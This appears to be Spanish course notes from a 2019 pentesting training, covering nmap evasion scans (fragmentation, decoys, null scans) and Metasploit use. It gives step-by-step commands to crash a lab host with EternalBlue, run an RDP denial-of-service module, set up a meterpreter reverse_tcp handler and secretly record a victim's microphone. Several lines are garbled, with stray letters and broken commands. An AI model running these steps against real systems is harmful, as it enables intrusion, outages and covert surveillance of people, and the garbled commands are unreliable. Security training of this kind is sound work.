Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
22: Escanear un host para servicios UDP (UDP scan)
Mayoría de los servicios populares de Internet se extienden sobre el protocolo TCP. DNS, SNMP y DHCP son tres de los servicios UDP
más comunes. Utilice la sintaxis siguiente para averiguar los servicios UDP:
Este tipo de análisis permite determinar qué protocolos IP (TCP, ICMP, IGMP, etc) son compatibles con los equipos de destino:
nmap -sO 192.168.1.1
Los siguientes tipos de exploración explotar una escapatoria sutil en el TCP y bueno para probar la seguridad de los ataques más co
munes:
# # TCP Null Scan para engañar a un servidor de seguridad para generar una respuesta # #
# # No establece ningún bit (encabezado TCP bandera es 0) # #
nmap -sN 192.168 0,1 0.254
La opción -f hace que la exploración solicitada (incluyendo las exploraciones ping) a utilizar pequeños paquetes
IP fragmentados. La idea es dividir la cabecera TCP a través de varios paquetes para que sea más difícil para los
filtros de paquetes, sistemas de detección de intrusos y otras molestias para detectar lo que está haciendo.
nmap -f 192.168.1.1
nmap -f fw2.nixcraft.net.in
nmap -f 15 fw2.nixcraft.net.in
# # Establece el tamaño de su propia compensación con la opción - mtu # #
nmap -mtu 32 192.168.1.1
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
La opción -D que aparecen al host remoto que el host (s) se especifica como señuelos a escanear la red de destin
o también . Así, sus IDS puede informar escaneos de puertos 5-10 de direcciones IP únicas, pero no sabrán qué
IP se escanearlos y que eran señuelos inocentes:
La sintaxis es la siguiente:
nmap 192.168.1.1 > output.txt
nmap -oN /ruta/del/archivo 192.168.1.1
nmap -oN output.txt 192.168.1.1
Es una herramienta para descubrimiento de redes extrayendo muchos detalles de los clientes conectados
dentro y fuera de la misma. Es la versión gráfica de NMAP - Network Mapper
Tiene muchos usos:
-Para bypasear firewalls
-Descubre todo tipo de protección y seguridad
-muestra macs y puertos abiertos
Hay libros, cursos y certificaciones solo dedicados a NMAP y ZENMAP
En el terminal ingresamos zenmap
A la derecha en la sección de Profile seleccionamos PING SCAN, intense scan plus UDP, intense scan, all TCP
ports, intense scan, no ping, Quick scan (obtenemos más detalles que Ping) , Quick sacan plus (muestra detalles
del SO y programas que corren los puertos abiertos) , quick traceroute, regular scan, Slow comprenhensive
scan
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
https://nmap.org/nsedoc/
buscamos eternalblue
eternalblue
smb-vuln-ms17-010 Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
options
set rhost 192.168.145.129
exploit
PANTALLAZO AZUL
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST
exploit
instalar etherape
instalar slowhttptest
arp-scan -l -I eth0
slowhttptest
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI
2.- Escuchar
GRABAR AUDIO
meterpreter > record_mic -d 20 -f audio.wav -p false
msfconsole P
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp E
msf exploit(handler) > set LHOST 192.168.145.128
msf exploit(handler) > set LPORT 4443
R
msf exploit(handler) > run S
luego de ejecutar el archivo . exe en la victima, pasamos a trabajar en la maquina atacante I
meterpreter > getuid S
T
Todos los derechos reservados ®2019, queda prohibida su reproducción total o parcial sin autorización de ECFORENSICS, según reglas del IEPI – SENADI